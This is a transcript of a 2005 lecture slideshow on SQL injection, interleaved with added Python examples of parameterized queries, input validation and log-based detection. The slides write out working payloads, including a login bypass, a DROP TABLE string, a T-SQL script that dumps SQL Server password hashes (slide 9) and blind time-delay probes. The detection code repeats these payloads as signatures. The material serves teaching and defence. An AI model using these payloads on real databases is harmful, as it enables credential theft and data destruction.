SQL Injection Attacks - PowerPoint PPT Presentation

About This Presentation
Title:

SQL Injection Attacks

Slides: 20
Provided by: andreyra
Category:
Tags: sql | attacks | injection


Transcript and Presenter's Notes


1
SQL Injection Attacks
  • Andrey Rakowitsch
  • November 18th 2005

2
First, What is SQL?
  • Structured Query Language: the interface to
    relational database systems.
  • Allows for insert, update, delete, and retrieval
    of data in a database.
  • ANSI/ISO standard, used extensively in web
    applications.
  • Example:
  • select ProductName from products where ProductID
    = 40

3
How is it normally used in websites?
  • Take user input from a web form and pass it to a
    server-side script via HTTP methods such as POST
    or GET.
  • Process request, open connection to database.
  • Query database and retrieve results.
  • Send processed results back to user.

(Diagram: Web server -> Application server -> Database server)
4
PHP example
  • $name = $HTTP_POST_VARS["name"];
  • $query = "select * from restaurants where name = '"
    . $name . "'";
  • $result = mysql_query($query);

5
What is SQL Injection?
  • The ability to inject SQL commands into the
    database engine through an existing application.
  • For example, if the user input is 23 or 1=1:
  • select ProductName from products where ProductID
    = 23 or 1=1
  • All product names will be returned. Data leak.

6
What is SQL Injection?
  • The flaw is in the web application, not in the
    database or web server.
  • No matter how patched your system is, no matter
    how many ports you close, an attacker can get
    complete ownership of your database.
  • NMap or Nessus will not help you against sloppy
    code.
  • In essence: client-supplied data used without
    validation.

7
Brief History of SQL Injection
  • First mention by rain forest puppy in Phrack 54,
    December 1998.
  • In February 2000 rfp published "How I hacked
    Packetstorm: A look at hacking wwwthreads via
    SQL".
  • January 2002: Chris Anley published "Advanced SQL
    Injection in SQL Server Applications", the first
    in-depth paper.
  • At Blackhat 2004, 0x90.org released SQeaL
    (predecessor to Absinthe).

8
What can SQL Injection do?
  • Delete
  • select productinfo from table where productname
    = 'whatever'; DROP TABLE productinfo --'
  • Bypass Authentication
  • select * from users where username='$user' and
    password='$passwd'
  • select * from users where username='admin'--' and
    password='whocares'
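The two outcomes on slides 5 and 8 (the data leak from 23 or 1=1 and the login bypass from admin'--) come from the same root cause: user input is pasted into the SQL text. The following is an added example, not code from the slides or from the presenter; it builds a constructed in-memory SQLite database (assumed tables products and users) and runs each query both the vulnerable way (string concatenation, as in the slide 4 PHP) and with bound parameters, so the difference can be observed directly.

```python
import sqlite3

# Constructed sample data (assumed schema, not from the slides).
def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (ProductID INTEGER PRIMARY KEY, ProductName TEXT);
        INSERT INTO products VALUES (23, 'Widget'), (40, 'Gadget'), (57, 'Gizmo');
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO users VALUES ('admin', 'S3cret!'), ('bob', 'hunter2');
    """)
    return conn


def product_name_vulnerable(conn: sqlite3.Connection, product_id: str) -> list:
    # Slide 5 pattern: the raw input becomes part of the SQL statement,
    # so "23 or 1=1" changes the WHERE clause instead of being a value.
    sql = "select ProductName from products where ProductID = " + product_id
    return [row[0] for row in conn.execute(sql)]


def product_name_safe(conn: sqlite3.Connection, product_id: str) -> list:
    # Bound parameter: the driver sends the input as a value; the database
    # never parses it as SQL. "23 or 1=1" simply matches no ProductID.
    sql = "select ProductName from products where ProductID = ?"
    return [row[0] for row in conn.execute(sql, (product_id,))]


def login_vulnerable(conn: sqlite3.Connection, user: str, passwd: str) -> bool:
    # Slide 8 pattern: admin'-- closes the string and comments out the
    # password check, so the admin row is returned without a password.
    sql = ("select * from users where username='" + user
           + "' and password='" + passwd + "'")
    return conn.execute(sql).fetchone() is not None


def login_safe(conn: sqlite3.Connection, user: str, passwd: str) -> bool:
    # Same query with two bound parameters: admin'-- is looked up literally
    # as a username and does not exist.
    sql = "select * from users where username=? and password=?"
    return conn.execute(sql, (user, passwd)).fetchone() is not None


def demo() -> dict:
    """Run both inputs from the slides against both query styles."""
    conn = build_db()
    return {
        "leak_vulnerable": product_name_vulnerable(conn, "23 or 1=1"),
        "leak_safe": product_name_safe(conn, "23 or 1=1"),
        "bypass_vulnerable": login_vulnerable(conn, "admin'--", "whocares"),
        "bypass_safe": login_safe(conn, "admin'--", "whocares"),
    }


if __name__ == "__main__":
    for label, result in demo().items():
        print(f"{label}: {result}")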

9
Not always that simple
  • Grabbing MS SQL Server hashes (reads the SQL Server
    2000-era system table master.dbo.sysxlogins)
  • '; begin declare @var varchar(8000), @xdate1
    datetime, @binvalue varbinary(255), @charvalue
    varchar(255), @i int, @length int, @hexstring
    char(16) set @var='' select @xdate1=(select
    min(xdate1) from master.dbo.sysxlogins where
    password is not null) begin while @xdate1 <=
    (select max(xdate1) from master.dbo.sysxlogins
    where password is not null) begin select
    @binvalue=(select password from
    master.dbo.sysxlogins where xdate1=@xdate1),
    @charvalue = '0x', @i=1, @length=datalength(@binvalue),
    @hexstring = '0123456789ABCDEF' while
    (@i<=@length) begin declare @tempint int,
    @firstint int, @secondint int select
    @tempint=CONVERT(int, SUBSTRING(@binvalue,@i,1))
    select @firstint=FLOOR(@tempint/16) select
    @secondint=@tempint - (@firstint*16) select
    @charvalue=@charvalue + SUBSTRING
    (@hexstring,@firstint+1,1) + SUBSTRING
    (@hexstring, @secondint+1, 1) select @i=@i+1
    end select @var=@var+' '+name+'/'+@charvalue
    from master.dbo.sysxlogins where xdate1=@xdate1
    select @xdate1 = (select isnull(min(xdate1),getdate())
    from master..sysxlogins where xdate1>@xdate1
    and password is not null) end select @var as x
    into temp end end --

10
Possibilities are endless
  • Some examples:
  • Brute-forcing passwords, using the attacked server
    to do the processing.
  • Interacting with the OS, reading and writing files.
  • Gathering IP information through reverse lookup.
  • Starting an FTP service on the attacked server.
  • Retrieving VNC passwords from the registry.
  • File uploading.

11
Error Based SQL Injection
  • select * from table where id = convert(int,SYSTEM_USER)
  • Output:
  • [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax
    error converting the nvarchar value 'sa' to
    a column of data type int.
  • Error-based SQL injection is used solely on
    Microsoft SQL Server.

12
Blind SQL Injection
  • When no explicit error information is available
    to the attacker.
  • Make use of boolean values to ask the database
    yes or no questions, then interpret the HTML results
    for TRUE and FALSE signatures.
  • Much slower: in the worst case, it takes
    7 yes or no questions to find the first character
    of a username using binary search.
  • That is why automated tools exist.

13
Blind SQL Injection (example)
  • Base cases:
  • eng.usf.edu/results.jsp?id=4 and 1=1 (always
    true)
  • eng.usf.edu/results.jsp?id=4 and 1=0 (always
    false)
  • Is the 8th character of the username greater than
    ASCII value 82?
  • Extract data a character at a time.

14
How to recognize T and F signatures?
  • Several solutions:
  • Keyword search
  • MD5 Sum
  • Text Difference Engine
  • HTML Parse Tree
  • Linear representation of ASCII sums
  • Tolerance Band Comparison with subtractive filter
  • Adaptive filter

15
Blind SQL Injection
  • NOTE: Even when boolean HTML signatures are not
    available, an attacker can use if statements to
    get a yes or no response. Examples:
  • '; if condition waitfor delay '0:0:5' --
    (MS SQL Server)
  • ' union select if( condition , benchmark
    (100000, sha1('test')), 'false' ),1,1,1,1
    (MySQL)

16
Prevention
  • Check and filter user input.
  • Length limit on input (most attacks depend on
    long query strings).
  • Different types of input have a specific
    language and syntax associated with them, e.g.
    name, email, etc.
  • Do not allow suspicious keywords (DROP, INSERT,
    SELECT, SHUTDOWN) as a name, for example.
  • Try to bind variables to specific types.
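The checks on this slide (length limits, a per-field syntax, binding to a type) are a defense-in-depth layer in front of the database call. The following is an added example, not code from the slides or the presenter: it binds a product id to an integer and applies allow-lists and length limits to a name and an email field. The field names, limits and patterns are hypothetical. Note the design choice: the name allow-list still admits an apostrophe, because O'Brien is a real name, which is why input validation complements bound parameters rather than replacing them, and why a keyword blacklist alone (which would reject a customer named Drop or Select) is a weak control.

```python
import re

# Hypothetical limits and patterns for this example; tune them per field.
MAX_NAME_LEN = 64
MAX_EMAIL_LEN = 254
NAME_RE = re.compile(r"[A-Za-z][A-Za-z '\-]*")
EMAIL_RE = re.compile(
    r"[A-Za-z0-9._%+\-]+@[A-Za-z0-9\-]+(\.[A-Za-z0-9\-]+)*\.[A-Za-z]{2,}"
)


def parse_product_id(raw: str) -> int:
    """Bind a ProductID field to a type: only a short plain integer passes,
    so '23 or 1=1' is rejected before any SQL is built."""
    if not re.fullmatch(r"\d{1,9}", raw.strip()):
        raise ValueError("product id must be a plain integer")
    return int(raw)


def validate_name(raw: str) -> str:
    """Length limit plus an allow-list of characters found in real names.
    The apostrophe is legitimate (O'Brien), so this check does NOT make string
    concatenation safe; the value must still be passed as a bound parameter."""
    name = raw.strip()
    if not 1 <= len(name) <= MAX_NAME_LEN:
        raise ValueError("name length out of range")
    if not NAME_RE.fullmatch(name):
        raise ValueError("name contains disallowed characters")
    return name


def validate_email(raw: str) -> str:
    """Email has its own syntax; anything outside it (quotes, comments,
    SQL keywords) simply fails the match."""
    email = raw.strip()
    if len(email) > MAX_EMAIL_LEN or not EMAIL_RE.fullmatch(email):
        raise ValueError("not a valid email address")
    return email.lower()


# One validator per expected form field; unexpected fields are rejected.
VALIDATORS = {"id": parse_product_id, "name": validate_name, "email": validate_email}


def validate_form(fields: dict) -> dict:
    """Validate every submitted field. Returns {'ok', 'values', 'errors'}
    and never raises, so callers can report all problems at once."""
    values, errors = {}, {}
    for key, raw in fields.items():
        validator = VALIDATORS.get(key)
        if validator is None:
            errors[key] = "unexpected field"
            continue
        try:
            values[key] = validator(raw)
        except ValueError as exc:
            errors[key] = str(exc)
    return {"ok": not errors, "values": values, "errors": errors}


if __name__ == "__main__":
    # Constructed inputs: one clean submission, one carrying the slide payloads.
    print(validate_form({"id": "40", "name": "O'Brien", "email": "Bob@Example.com"}))
    print(validate_form({"id": "23 or 1=1",
                         "name": "x'; DROP TABLE productinfo --",
                         "email": "bob@example.com' or 1=1--"}))
```

The validated values are then handed to the database only as bound parameters, as on the previous slides; validation narrows what reaches the query, parameterization guarantees it is treated as data.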

17
Prevention
  • Call stored procedures instead of directly
    sending SQL statements to the database.
  • Good in order to bind variables.
  • Has some overhead associated with it.
  • Harder to code, not as flexible.

18
Prevention
  • Principle of Least Privilege
  • A user or process should have the lowest level of
    privilege required in order to perform its
    assigned task.
  • If you know a specific user will only read from
    the database, do not grant that user root privileges.
  • Segregate users. Define roles.

19
Prevention
  • Configure error reporting:
  • Never expose any error information to the user.
  • Intrusion Detection System:
  • It is possible to get signatures of SQL Injection
    (especially blind) attacks.
  • Log DoS-like behavior.
  • "Warning: illegal use of this application has
    been detected. Legal action will be taken."
  • Random seed generation to mess up True and False
    signatures.
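The IDS idea on this slide (signatures of SQL injection, especially the repetitive yes/no probing of blind injection, and DoS-like request volumes) can be checked against ordinary web server logs. The following is an added example, not code from the slides or the presenter: it parses constructed Apache-style access log lines (the IPs, paths and timestamps are made up; the payload shapes are the ones shown on slides 8, 13 and 15), tags each request with the signature classes it matches, and flags a source that sends repeated boolean or character-extraction probes at one path. The thresholds and signature patterns are hypothetical starting points, not a tuned rule set.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample log (Apache common log format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [18/Nov/2005:10:00:01 -0500] "GET /results.jsp?id=4 HTTP/1.1" 200 2048
10.0.0.9 - - [18/Nov/2005:10:00:02 -0500] "GET /results.jsp?id=4%20and%201=1 HTTP/1.1" 200 2048
10.0.0.9 - - [18/Nov/2005:10:00:03 -0500] "GET /results.jsp?id=4%20and%201=0 HTTP/1.1" 200 1170
10.0.0.9 - - [18/Nov/2005:10:00:04 -0500] "GET /results.jsp?id=4%20and%20ascii(substring(user,8,1))%3E82 HTTP/1.1" 200 2048
10.0.0.9 - - [18/Nov/2005:10:00:05 -0500] "GET /results.jsp?id=4%20and%20ascii(substring(user,8,1))%3E100 HTTP/1.1" 200 1170
10.0.0.7 - - [18/Nov/2005:10:00:06 -0500] "GET /login.php?user=admin'--&pass=x HTTP/1.1" 302 0
10.0.0.8 - - [18/Nov/2005:10:00:07 -0500] "GET /results.jsp?id=4';waitfor%20delay%20'0:0:5'-- HTTP/1.1" 200 2048
10.0.0.5 - - [18/Nov/2005:10:00:08 -0500] "GET /results.jsp?id=5 HTTP/1.1" 200 1990
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# Hypothetical signature classes, applied to the URL-decoded query string.
SIGNATURES = {
    "boolean_probe": re.compile(r"\b(and|or)\s+1\s*=\s*[01]\b", re.I),
    "comment_terminator": re.compile(r"(--|/\*)"),
    "time_based": re.compile(r"waitfor\s+delay|benchmark\s*\(", re.I),
    "stacked_or_union": re.compile(
        r";\s*(drop|insert|update|delete|shutdown)\b|union\s+select", re.I),
    "char_extraction": re.compile(r"\b(ascii|substring|substr)\s*\(", re.I),
}


def parse_line(line: str):
    """Split one log line into fields; the query string is URL-decoded."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    path, _, query = rec["url"].partition("?")
    rec["path"], rec["query"] = path, unquote_plus(query)
    return rec


def classify(query: str) -> list:
    """Return the sorted list of signature classes the query matches."""
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(query))


def analyze(log_text: str, probe_threshold: int = 3) -> dict:
    """Tag suspicious requests, count requests per source (DoS-like volume),
    and flag sources that repeat blind-injection probes against one path."""
    hits, probes, per_ip = [], Counter(), Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        per_ip[rec["ip"]] += 1
        tags = classify(rec["query"])
        if not tags:
            continue
        hits.append((rec["ip"], rec["path"], tags))
        if "boolean_probe" in tags or "char_extraction" in tags:
            probes[(rec["ip"], rec["path"])] += 1
    blind_suspects = sorted(k for k, n in probes.items() if n >= probe_threshold)
    return {"hits": hits, "blind_suspects": blind_suspects, "requests_per_ip": per_ip}


if __name__ == "__main__":
    report = analyze(SAMPLE_LOG)
    for ip, path, tags in report["hits"]:
        print(f"{ip} {path} {','.join(tags)}")
    print("blind-injection suspects:", report["blind_suspects"])
```

The per-path probe counter is the part that matters for blind injection: a single "and 1=1" may be noise, but the same source walking ascii()/substring() comparisons against one parameter is the binary search described on slides 12 and 13, and it is visible in the log long before any data leaves.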